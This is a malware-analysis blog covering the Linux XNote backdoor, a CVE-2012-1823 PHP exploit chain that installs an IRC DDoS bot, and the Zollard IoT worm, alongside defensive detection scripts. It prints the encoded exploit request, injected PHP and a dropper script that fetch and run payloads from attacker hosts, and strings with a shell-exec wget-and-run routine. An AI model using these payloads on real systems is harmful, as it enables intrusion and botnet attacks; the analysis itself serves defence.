Monday, February 9, 2015

Linux.BackDoor.XNote.1 indicators

We continue to see a variety of Linux ELF malware, particularly those focused on DDoS.
Over the past few years, the good folks at Malware Must Die have done an extensive study of ELF malware variants at their blog: http://blog.malwaremustdie.org/

Today, DrWeb wrote about a multipurpose Linux ELF called 'xnote' that opens a backdoor on the compromised host. The host is then put to a variety of uses, including acting as a DDoS bot.
The DrWeb posts provide a very good analysis of the malware and its overall structure.
http://news.drweb.com/show/?i=9272&lng=en&c=5
http://vms.drweb.com/virus/?i=4323517

We decided to take a closer look at this sample in order to provide a few indicators that may be of interest.
The xnote sample we studied has MD5 hash f374d1561e553a4c5b803e1d9d15a34e.

Upon execution, we observed the sample contacting the DNS server at 114.114.114.114 with queries for the following domains:

  • a.et2046.com
  • b.et2046.com
  • c.et2046.com
Each of these queries returned the IP address 122.10.85.54.

In our run, the malicious 'xnote' process had process ID 1303. Using Volatility to map the process's memory regions, we noted:
Volatility Foundation Volatility Framework 2.4
Pid  Start      End        Flags Pgoff    Major Minor Inode  Path              
1303   0xc01000   0xc02000 r-x        0x0     8     1 405848 /home/mattyh/xnote
1303  0x8048000  0x81ba000 r-x        0x0     0     0      0                   
1303  0x81ba000  0x81c4000 rwx        0x0     0     0      0                   
1303  0xa137000  0xa158000 rwx        0x0     0     0      0 [heap]            
1303 0xb78b6000 0xb78b7000 r-x        0x0     0     0      0 [vdso]            
1303 0xbf843000 0xbf859000 rwx        0x0     0     0      0 [stack]

Dumping the associated data from each segment, we were able to recover a few artifacts from the process, including the domains queried.

XXXXXXXXXXXXXXXX122.10.85.54
a.et2046.com
b.et2046.com
c.et2046.com
e.et2046.com
test
CAk[S
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
.,-+xX0123456789abcdef0123456789ABCDEF-+xX0123456789abcdefABCDEF
-0123456789

-0123456789
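The segment dump above mixes the useful artifacts (the queried domains and the resolved address) with junk such as the format tables. As an added example, not code from the original post, the following script does what we did by hand: it pulls printable strings out of a dumped segment, extracts anything that looks like a domain name or IPv4 address, and splits the result into the known xnote indicators and other names that still need triage. The sample segment is constructed from the strings recovered above; the regexes and minimum string length are assumptions of this example.

```python
import re

# Indicators taken from the xnote write-up above: the queried domains and the address they resolved to.
XNOTE_DOMAINS = {"a.et2046.com", "b.et2046.com", "c.et2046.com", "e.et2046.com"}
XNOTE_IPS = {"122.10.85.54"}

PRINTABLE = frozenset(range(0x20, 0x7F))
# Lookarounds instead of \b so that "XXXXXXXX122.10.85.54" (as seen in the dump) still yields the address.
DOMAIN_RE = re.compile(r"(?<![a-z0-9.-])(?:[a-z0-9-]+\.)+[a-z]{2,}(?![a-z0-9.-])", re.IGNORECASE)
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def extract_strings(data, min_len=4):
    """Printable-ASCII runs of at least min_len bytes, the same idea as strings(1)."""
    found, run = [], bytearray()
    for b in data:
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


def find_indicators(data):
    """Domain names and IPv4 addresses found in the printable strings of a dumped segment."""
    domains, ips = set(), set()
    for s in extract_strings(data):
        domains.update(m.lower() for m in DOMAIN_RE.findall(s))
        ips.update(IPV4_RE.findall(s))
    return domains, ips


def match_iocs(data):
    """Split what was recovered into known xnote indicators and other network names worth triage."""
    domains, ips = find_indicators(data)
    return {
        "ioc_domains": sorted(domains & XNOTE_DOMAINS),
        "ioc_ips": sorted(ips & XNOTE_IPS),
        "other_domains": sorted(domains - XNOTE_DOMAINS),
        "other_ips": sorted(ips - XNOTE_IPS),
    }


# Constructed stand-in for one dumped rwx segment: the strings recovered above, separated by non-printable bytes.
SAMPLE_SEGMENT = (
    b"\x00" * 16
    + b"XXXXXXXXXXXXXXXX122.10.85.54\x00"
    + b"a.et2046.com\x00b.et2046.com\x00\x01\x02c.et2046.com\x00e.et2046.com\x00"
    + b"test\x00CAk[S\x00\x7f\x80www.example.org\x00"
)

if __name__ == "__main__":
    for key, values in match_iocs(SAMPLE_SEGMENT).items():
        print(f"{key}: {values}")
```

Run it against the output of Volatility's segment dump for each region of the process; anything in `other_domains` or `other_ips` is a candidate for the same passive-DNS and whois work shown further down.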


Domain and IP Information:

It is interesting to note that the domain "et2046.com" has been seen before in other Linux ELF malware:
  • A May 2014 post to an Ubuntu forum noted the subdomains 'kill.et2046.com' and 'sb.et2046.com' in a running process on a compromised Ubuntu host.
  • Malware Must Die posted an analysis of the Linux iptablex malware in which these domains were also seen.
  • VirusTotal searches turn up further malware related to these domains.


Passive DNS data from Farsight Security's DNSDB shows that the only current DNS record pointing at IP address 122.10.85.54 is:

www.qtol.tv. A 122.10.85.54

Additional information from DNSDB for the domain et2046.com:

count 54
first seen in zone file 2014-11-12 17:13:42 -0000
last seen in zone file 2015-01-13 17:23:33 -0000
et2046.com. NS a.dnspod.com.
et2046.com. NS b.dnspod.com.
et2046.com. NS c.dnspod.com.


count 329
first seen in zone file 2013-12-17 17:13:33 -0000
last seen in zone file 2014-11-11 17:12:29 -0000
et2046.com. NS ns155.dnsever.com.
et2046.com. NS ns165.dnsever.com.
et2046.com. NS ns179.dnsever.com

Note that the malware uses a hardcoded DNS server, 114.114.114.114, for all of its domain resolution. This is a public DNS server based in China, with its web page at www.114dns.com.
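A host that sends DNS queries directly to a resolver it was never configured with is a strong signal on its own, independent of which domains it asks for. As an added example (not part of the original post), the script below audits DNS query records against two rules: queries to any resolver outside the organisation's sanctioned set, and queries for the et2046.com domain family (including subdomains such as the sb. and kill. hosts mentioned above). The log format and the sanctioned resolver 10.0.0.53 are constructed for this example, not a Zeek or tcpdump layout.

```python
import re
from collections import Counter

# Constructed policy for this example: the organisation's only sanctioned recursive resolver.
ALLOWED_RESOLVERS = {"10.0.0.53"}
# Indicators from the xnote write-up above: the resolver the sample hard-codes and the domain it queries.
XNOTE_RESOLVER = "114.114.114.114"
IOC_DOMAIN_SUFFIXES = ("et2046.com",)

# Constructed log format for this example: one DNS query per line.
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+qname=(?P<qname>\S+)$")


def parse_line(line):
    """One log line -> dict, or None for anything that does not match the expected layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["qname"] = rec["qname"].rstrip(".").lower()
    return rec


def is_ioc_domain(qname):
    """True for the indicator domain itself or any subdomain of it (a., b., c., sb., kill., ...)."""
    return any(qname == s or qname.endswith("." + s) for s in IOC_DOMAIN_SUFFIXES)


def audit_dns_log(lines, allowed=ALLOWED_RESOLVERS):
    """Return (src, qname, reasons) for every query that breaks resolver policy or hits an IoC domain."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        if rec["dst"] not in allowed:
            reasons.append("unsanctioned resolver " + rec["dst"])
        if is_ioc_domain(rec["qname"]):
            reasons.append("IoC domain " + rec["qname"])
        if reasons:
            findings.append((rec["src"], rec["qname"], reasons))
    return findings


def hosts_to_triage(findings):
    """Findings per internal source host; the infected host stands out immediately."""
    return Counter(src for src, _, _ in findings)


# Constructed sample: one clean query, one host behaving like the xnote sample, one IoC hit via the
# sanctioned resolver, and a malformed line the parser must skip.
SAMPLE_LOG = [
    "2015-02-09T10:00:01Z src=10.0.0.5  dst=10.0.0.53        qname=www.example.com.",
    "2015-02-09T10:00:02Z src=10.0.0.17 dst=114.114.114.114  qname=a.et2046.com.",
    "2015-02-09T10:00:02Z src=10.0.0.17 dst=114.114.114.114  qname=b.et2046.com.",
    "2015-02-09T10:00:03Z src=10.0.0.17 dst=114.114.114.114  qname=c.et2046.com.",
    "2015-02-09T10:00:09Z src=10.0.0.22 dst=10.0.0.53        qname=sb.et2046.com.",
    "garbage line that the parser must skip",
]

if __name__ == "__main__":
    results = audit_dns_log(SAMPLE_LOG)
    for src, qname, reasons in results:
        print(src, qname, "; ".join(reasons))
    print(hosts_to_triage(results))
```

The resolver rule is the durable one: the domains will change with the next build, but a bot that carries its own resolver address bypasses the internal DNS servers where most monitoring lives, so blocking outbound UDP/TCP 53 to anything but the sanctioned resolvers both detects and breaks this behaviour.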



whois for 114.114.114.114

inetnum:        114.114.0.0 - 114.114.255.255
netname:        XFInfo
descr:          NanJing XinFeng Information Technologies, Inc.
descr:          Room 207, Building 53, XiongMao Group, No.168 LongPanZhong Road
descr:          Xuanwu District, Nanjing, Jiangsu, China
country:        CN
irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn

person:         Yan Jian
nic-hdl:        YJ1777-AP
e-mail:         jyan@greatbit.com

person:         Zhao Zhenping
nic-hdl:        ZZ2094-AP
e-mail:         ping@greatbit.com

whois for 122.10.85.54

inetnum:        122.10.80.0 - 122.10.95.255
netname:        TOINTER-CN
descr:          Royal Network Technology Co., Ltd. in Guangzhou
country:        HK
admin-c:        WX2631-AP
tech-c:         WX2631-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-CN-TOINTER122
mnt-irt:        IRT-TOINTER-CN
changed:        tengdayx@gmail.com 20150112
source:         APNIC

irt:            IRT-TOINTER-CN
address:        Liwan District of Guangzhou, Guangdong Fangcun West 533, guangzhou guangdong 510360
e-mail:         abuse@gzroyal.cn
abuse-mailbox:  abuse@gzroyal.cn
admin-c:        RNTC1-AP
tech-c:         RNTC1-AP
auth:           # Filtered
mnt-by:         MAINT-TOINTER-CN
changed:        hm-changed@apnic.net 20140919
source:         APNIC

person:         Wei XeiJun
address:        Liwan District of Guangzhou, Guangdong Fangcun West 533
country:        CN
phone:          +86.1234567890
e-mail:         tengdayx@qq.com
nic-hdl:        WX2631-AP
mnt-by:         MAINT-TOINTER-CN
changed:        tengdayx@qq.com 20150111


whois for domain et2046.com

Domain Name: ET2046.COM
Registry Domain ID: 1762221508_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2014-08-25T06:58:17Z
Creation Date: 2012-11-27T14:02:55Z
Registrar Registration Expiration Date: 2016-11-27T14:02:55Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.480-624-2505

Registry Registrant ID: 
Registrant Name: smaina smaina
Registrant Organization: 
Registrant Street: Beijing
Registrant City: Beijing
Registrant State/Province: Beijing
Registrant Postal Code: 100080
Registrant Country: China
Registrant Phone: +86.18622222222
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: tuhao550@gmail.com


-----------------------------------------------------------------------------------------------------------------------
(Uses same password scheme as Contagio.  Ping me or Mila for details if needed)

Thursday, February 5, 2015

Library of Malware Traffic Patterns


Update February 2015 
Use the new link below for a new interface and updates.

Traffic analysis has long been the primary method of malware identification, and the thousands of IDS signatures developed are the daily proof. Signatures definitely help, but the ability to visually recognize malware traffic patterns has always been an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming, and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as a "personal notes" spreadsheet of GET and POST requests for different malware families, with information from open sources. We decided others might find it useful too.

Click on the column headers to see recent entries. Use other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. URI and User-Agent fields might have spaces for easier cell wrapping. Remove them if you export the data.
Yes, you can download samples mentioned in the spreadsheet. See the "dl" column in the full spreadsheet table and corresponding links to the download location. Use "Contagio" password scheme (email Mila or admin at deependresearch.org)
Image credit: Jay Walker Library. Src.Vancouversun

VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS"

List of malware families and available downloads for their samples and pcaps (click on the link above for the full post)


Tuesday, July 8, 2014

Another Linux DDoS bot via CVE-2012-1823

If you run a web server, you should be very familiar with the PHP vulnerability classified as CVE-2012-1823. Successful exploitation of this vulnerability allows a remote attacker to inject arbitrary code via command-line options within the HTTP query string. Unfortunately, a large number of PHP servers remain unpatched against this vulnerability, making them an ideal vehicle for acting as a DDoS bot.

Our friends at MalwareMustDie have recently put up several excellent posts discussing Linux malware, particularly dealing with DDoS.  While they have covered a wide spectrum of Linux malware in the wild, it seems that new variants and bot infrastructures are continually being spun up.  We like to study and track these variants and infrastructures, as well as the payloads that are being injected.  In this case, one particular payload caught our eye.

The exploit attempt we observed carried the following URL-encoded request:

POST //cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Host: -h

When decoded, the actual query string is:

Decoded CVE-2012-1823 exploit attempt

Upon successful compromise, the attacker injects the following:

<? system("cd /tmp ; wget <redacted>.us.to/seed.jpg ; curl -O http://<redacted>.us.to/seed.jpg ; fetch http://<redacted>.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed ; rm -rf * "); ?>

"seed.jpg" is actually a tar file, which when expanded reveals a bash script named "seed":

#!/bin/bash
cd /var/tmp/ ;wget <redacted>.us.to/index.htm; curl -O http://<redacted>.us.to/index.htm; fetch http://<redacted>.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget <redacted>.us.to/stats.php;fetch http://<redacted>.us.to/stats.php ;curl -O http://<redacted>.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun

This script instructs the compromised server to fetch 'index.htm' from http://<redacted>.us.to. This again is a tar file, which when expanded, gives a file named "libssl3.so.2".  This file is actually a perl script called "DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team".  A copy of this popular IRCBot can be found at this PasteBin link.
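Every stage of this chain hides a gzip-compressed tar behind a harmless-looking name: "seed.jpg", "index.htm", "stats.php". File type is therefore the thing to check, not the extension. As an added example (not code from the original post), the script below identifies a file by its leading bytes, flags a mismatch between what the extension promises and what the content is, and lists the members of a tar.gz without extracting anything to disk. The stand-in dropper is constructed in memory with a benign one-line script, and the extension-to-type table is an assumption of this example.

```python
import io
import os
import tarfile

# Leading-byte signatures (all widely documented magic numbers).
MAGIC = (
    (b"\x1f\x8b", "gzip"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x7fELF", "elf"),
    (b"#!", "script"),
)
# Assumed policy: what each extension is allowed to contain; anything else is a mismatch.
EXPECTED_BY_EXT = {
    ".jpg": {"jpeg"}, ".jpeg": {"jpeg"},
    ".htm": {"html"}, ".html": {"html"},
    ".php": {"php", "html"},
}


def identify(data):
    """Coarse content type from magic bytes; falls back to a text sniff for HTML/PHP."""
    for sig, kind in MAGIC:
        if data.startswith(sig):
            return kind
    if len(data) > 262 and data[257:262] == b"ustar":  # uncompressed POSIX tar
        return "tar"
    head = data[:256].lstrip().lower()
    if head.startswith(b"<?php"):
        return "php"
    if head.startswith((b"<!doctype html", b"<html")):
        return "html"
    return "unknown"


def check_file(name, data):
    """Report the detected type and whether it contradicts the file extension."""
    kind = identify(data)
    expected = EXPECTED_BY_EXT.get(os.path.splitext(name)[1].lower())
    return {"name": name, "detected": kind, "mismatch": expected is not None and kind not in expected}


def list_members(data):
    """Member names inside a gzip-compressed tar, read from memory only."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tf:
        return [m.name for m in tf.getmembers()]


def build_fake_dropper(member, payload):
    """Constructed stand-in for seed.jpg: a .tar.gz holding one shell script."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        info = tarfile.TarInfo(member)
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


if __name__ == "__main__":
    fake = build_fake_dropper("seed", b"#!/bin/bash\necho constructed sample\n")
    for name in ("seed.jpg", "index.htm", "stats.php"):
        print(check_file(name, fake))
    print("members:", list_members(fake))
```

The same check belongs in a web proxy or file-upload path: a response body that starts with `1f 8b` but is served as an image or HTML is exactly what the `wget`/`curl`/`fetch` lines in the seed script pull down.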

Some of the configuration variables for the version of IrcBot dropped on our honeypots include:
$server = 'antiq.scifi.ro'
$server = 'antiq.evils.in'
my @admins = ("AnTiQ","deathy","Vasy");
my @hostauth = ("Qiss.users.undernet.org","Amadeo.users.undernet.org");
my @channels = ("#vnc");

The "seed" script also instructed our server to download "stats.php". This was also a tar file, which when expanded created a hidden directory named ".d" containing the following files:

Contents of hidden '.d' subdirectory
The subdirectory "c" contained source files for port flooding routines.

Contents of 'c' subdirectory


Section of "Slashing SirVic's" flooding source code.

Two other files included in the "stats.php" tarball were of particular interest. They are named "bang.txt" and "shiet.txt", and contain long lists of IP addresses and ports. At this point, it's not clear what these lists represent; however, "bang.txt" appears to contain many non-U.S. addresses, notably weighted toward Romania. "shiet.txt" contains a wide variety of IP addresses, representing many kinds of organizations, corporations, universities, and service providers.
After observing several DDoS attacks initiated by this infrastructure, we did not note a correlation between these lists and any attack victims. We also have not yet observed any correlation between these lists and the compromised hosts initiating DDoS attack traffic.

The contents of "bang.txt", broken out by ASN and Network name can be viewed from here: Link to "bang.txt"

The contents of "shiet.txt", broken out by ASN and Network name can be viewed from here:  Link to "shiet.txt"

Soon after the script downloads completed, our server joined the IRC server at antiq.scifi.ro (195.182.159.51).

Bot joining C2 on antiq.scifi.ro
Not long after that, a command initiating a flood attack against 70.39.96.225 was issued, and the compromised host began sending fragmented UDP packets to the victim.


Bot being instructed to begin UDP flood to victim

Packet capture of UDP flood
We've observed this botnet to be very active, targeting a wide variety of victims. While IRC botnets have been around for many years, the seeding and attack mechanisms continue to evolve.

Unpatched CMS installations, weak SSH passwords, and vulnerable PHP deployments remain a major weak spot in Internet-facing servers. It's pretty safe to say that if web site administrators do not run a regular, stringent patch management program, it's just a matter of 'when', not 'if', they will be compromised.



Tuesday, December 3, 2013

Hey Zollard, leave my Internet of Things alone!

We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts.  So Symantec's recent report about Linux.Darlloz targeting "The Internet of Things" was of particular interest.

Recently I noted an inbound PHP exploit attempt from 78.39.232.113 - Telecommunication Company of Kordestan - Iran

PHP exploit attempt from 78.39.232.113
The decoded POST is:

-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n

Note the User-Agent "Zollard" and the references to the files that will be fetched and executed upon successful compromise. The file names indicate several architectures: arm, ppc, mips, mipsel, and x86.

All files were fetched, and the x86 file was sandboxed on a Linux VM. Immediately the VM began incrementally scanning 117.201.0.0/18 for hosts with destination port 58455 open. The Linux malware also opened a listener on my VM's port 58455.

Compromised host listening on port 58455

Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies, including 0x010005, 0x01010006, or 0x01020006.

Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445. Examining the strings of the malware files shows several usernames that are attempted, including "root" and "admin".
Weak or non-existent passwords allow for a successful Telnet login, with examples below:
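The sandbox behaviour described above gives a defender two network-side handles: a fixed opening message on an unusual port, and a single source fanning out to consecutive addresses on that port. As an added example (not code from the original post), the script below checks a payload for the 0x00020015 opening bytes and sifts flow records for sources reaching many distinct hosts on port 58455, noting whether the targets form a sequential sweep inside 117.201.0.0/18. The flow records, the fan-out threshold, and the flow tuple layout are constructed for this example.

```python
import ipaddress
from collections import defaultdict

ZOLLARD_PORT = 58455
ZOLLARD_HELLO = bytes.fromhex("00020015")      # first message the scanner sends, per the write-up above
SCANNED_NETWORK = ipaddress.ip_network("117.201.0.0/18")


def is_zollard_hello(payload):
    """Signature check on the opening bytes of the peer handshake."""
    return payload[:4] == ZOLLARD_HELLO


def find_fan_out(flows, port=ZOLLARD_PORT, min_targets=8):
    """flows: (src, dst, dport) tuples. Sources reaching >= min_targets distinct hosts on the port."""
    targets = defaultdict(set)
    for src, dst, dport in flows:
        if dport == port:
            targets[src].add(ipaddress.ip_address(dst))
    return {src: sorted(dsts) for src, dsts in targets.items() if len(dsts) >= min_targets}


def is_sequential_sweep(addresses):
    """True when the sorted targets form one contiguous run, the incremental pattern seen in the sandbox."""
    ints = sorted(int(ipaddress.ip_address(a)) for a in addresses)
    return len(ints) > 1 and all(b - a == 1 for a, b in zip(ints, ints[1:]))


def report(flows):
    """Per suspicious source: how many targets, whether the sweep is sequential, and where it points."""
    out = {}
    for src, dsts in find_fan_out(flows).items():
        out[src] = {
            "targets": len(dsts),
            "sequential": is_sequential_sweep(dsts),
            "in_scanned_network": all(a in SCANNED_NETWORK for a in dsts),
        }
    return out


# Constructed flow records: one infected host sweeping 117.201.0.1-20, one host with unrelated traffic.
SAMPLE_FLOWS = [("10.0.0.9", f"117.201.0.{i}", 58455) for i in range(1, 21)] + [
    ("10.0.0.4", "93.184.216.34", 443),
    ("10.0.0.4", "117.201.0.5", 58455),
]

if __name__ == "__main__":
    print(report(SAMPLE_FLOWS))
    print(is_zollard_hello(b"\x00\x02\x00\x15\x00\x00"))
```

A single connection to port 58455 (10.0.0.4 above) is not reported; the fan-out threshold is what separates a scanner from a host that happened to talk to one peer, and the sequential check distinguishes an address sweep from a list of unrelated contacts.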


Example of Telnet session to a BusyBox device

Example of Telnet session to ARM architecture device

As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched.  You may find it of interest to see a strings dump of each of the files:


#EgvT2
@ #!
!1C "
V! 0
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/0.run
/var/1.run
/var/idhash
/var/response
/var/challenge
/var/b.arm_v5t
/var/b.arm_v6k
/var/f.arm_v5t
/var/f-t2.arm_v6k
/var/f-t2.mips
/var/f-t2.mipsel
/var/sp.arm_v5t
/var/sp.arm_v6k
/var/t2.arm_v6k
/var/readme
/var/b/b3.arm_v5t
/var/b/b3.arm_v6k
/var/b/b3.mips
/var/b/b3.ramips
/var/b/b3.rtl
/var/b/readme
/var/b/0.run
/var/b/1.run
/var/b/idhash
/dav/0.run
/dav/1.run
/dav/b3.arm_v5t
/dav/b3.arm_v6k
/dav/b3.mips
/dav/b3.rtl
/dav/idhash
/dav/readme
/var/b
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
